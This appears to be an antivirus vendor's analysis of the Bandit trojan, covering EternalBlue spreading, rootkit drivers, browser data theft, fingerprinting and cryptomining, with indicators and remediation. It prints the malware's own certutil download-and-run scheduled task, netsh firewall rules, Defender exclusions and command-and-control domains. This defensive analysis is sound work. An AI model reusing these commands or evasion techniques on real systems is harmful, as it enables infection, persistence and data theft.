Trojan.Win32.Bandit.ApLib

General explanation

Type: Trojan

Degree of destruction: high

Prevalence: high

Names of the malware:

  • Trojan.Win32.Bandit.ApLib (Padvish)
  • HEUR:Trojan.Win32.Chapak.pef (Kaspersky)
  • TR/AD.GoCloudnet.irwn ( Avira)

What is a Trojan?

Trojans are malware types that introduced themselves as healthy and legal software and acted similar to useful and applicable software but cause many destructions to the system when executing. The downloaded software from the internet, placing HTML text, attaching to an email, etc. are ways that trojans using to enter the system. Contrary to viruses and computer worms, Trojans are not reproducible.

What is Bandit Trojan?

Bandit is a Trojan that hides its files and processes using low-level techniques of Window (kernel). This malware uses EternalBlue for distribution. Then, it will download different modules connected to the command and control server and executes them on the victim’s system.

Technical explanation

Signs of infection 

  • TestApp registry key with malicious domains in the following sub-keys.
  • Two scheduled tasks as follows that one of them will execute the malware update file, and the other with executing the file of the malware on the system

name : ScheduledUpdate

command : "cmd.exe /C certutil.exe -urlcache –split –f hxxps://bestblues[.]tech/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340"

scheduled : ONLOGON

name : csrss

command : "C:\Windows\rss\csrss.exe"

scheduled : ONLOGON

  • The sub-key in the Run registry key which is executing the “C:\Windows\rss\csrss.exe” file
  • The following suspicious Firewall laws:

Cmd.exe /c “netsh advfirewall firewall add rule name=”csrss” dir=”in” action=allow program=”C:\Windows\rss\csrss.exe” enable=yes”

Cmd.exe /c “netsh advfirewall firewall add rule name=”csrss” dir=”in” action=allow program=”%AppData%Roaming\EpicNet Inc\CloudNet\cloudnet.exe” enable=yes”

  • The following items in the Windows Defender exception list

• Files/Directories:

C:\Windows

C:\Windows\rss

AppData%Roaming\EpicNet Inc\CloudNet

AppData%Local\Temp\csrss

AppData%\Roaming\WisprPine

C:\Windows\Windefender

AppData%Local\Temp\Wup

C:\Windows\System32\drivers

• Processes: csrss.exe , cloudnet.exe , windefender.exe

Explaining the action 

Performing the technique of identification Sandbox and VM 

The malware tries to execute techniques to understand whether the execution environment is VM or Sandbox. It will stop the execution if it detects the environment.

Malicious sub-key of TestApp registry key

As mentioned before, the malware will create a key with the name of TestApp in the HKCU\software\microsoft\TestApp. In this case, the mentioned key has many sub-key such as the following items (the amounts of this sub-key, especially the server addresses” will possibly different. Also, in the new type of this malware, it will use random strings such as “dd47a129” in replace of “TestApp”):

Key : HKCU\software\microsoft\TestApp

Subkeys :

Uuid = ""

command = ""

FirstInstallDate = "56268135e"

ServiceVersion = ""

SC = ""

PGDSE = ""

VC = ""

ServerVersion = "94"

CDN = "hxxps://bestblues[.]tech"

PP = ""

name = "SmallSea"

servers = "hxxps;//whitecontroller[.]com , sleepingcontrol[.]com, venoxcontrol[.]com, okonewwacon[.]com"

firewall = ""

defender = ""

Creating the csrss processes

The malware will create the C:\Windows\rss directory and turns it into a hidden directory, after executing techniques for upgrading the access level. Then, it will copy its file in this path with this name: csrss.exe.

Distribution in the local network 

This malware uses the tools related to EternalBlue and DoublePulsar vulnerabilities for distribution. Systems with vulnerable versions detect the SMB protocols at the network level and by using this vulnerability, will execute its malware on it.

Downloading Drivers 

Malware will create and run three drives:

  1. Winmon.sys drive: this drive is used to hide malware processes
  2. WinmonFs.sys drive: this drive hides the directory/files of the malware from the sight of antiviruses and monitoring tools.
  3. WinmonProcessMonitor drive: this drive has a long list of the name of processes related to system monitoring products, antiviruses, etc. and it will survey the name of the new processes does not involve in this list when creating each process on the system. Otherwise, it will end the execution of the malware.

Downloading and executing malware module 

  1. Browser Stealer module: this module steals cookies, history, and local storage of browsers such as Chrome, Coccoc, Firefox, Opera, and Yandex and it will send them to the server in the format of a zip file
  2. Router Exploit Module: this module executes to sue the rooter’s vulnerabilities on the network level.
  3. Collectchromefingerprint: this module analyzes that whether the Chrome browser is installed on the system. It will open the following link in the browser if it is installed on the system.

hxxps://swebgames[.]site/test.php?uuid=a1058f4a-2f08-4679-baf2-ae6c436cfaa5&browser=chrome

This link is a blank page which in the background will execute a JavaScript library “DetectRTC” with the link of https://github.com/muaz-khan/DetectRTC and analyze the features of WebRTC such as whether the victim’s system has a Microphone, Speaker, Webcam; the number of media systems, the possibility for snapshot, etc. and send the results to the following path:

hxxps://swebgames[.]site/fp.php

4. bot module: this module will register the victim’s system in the malware servers and then will connect it many times. Obtaining a list of active pools of the bitcoin network and connecting with them to perform mining cryptocurrencies on the victim’s service is one of these connections.

How to deal with it and disinfect the system

Padvish Antivirus detects and disinfects this malware. To prevent any possible infection by malware that uses EternalBlue vulnerability, it is recommended to use the provided security patch ms17-010 from Microsoft Co. Padvish IPS will detect malware that uses this kind of vulnerability and will prevent them from entering the system.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>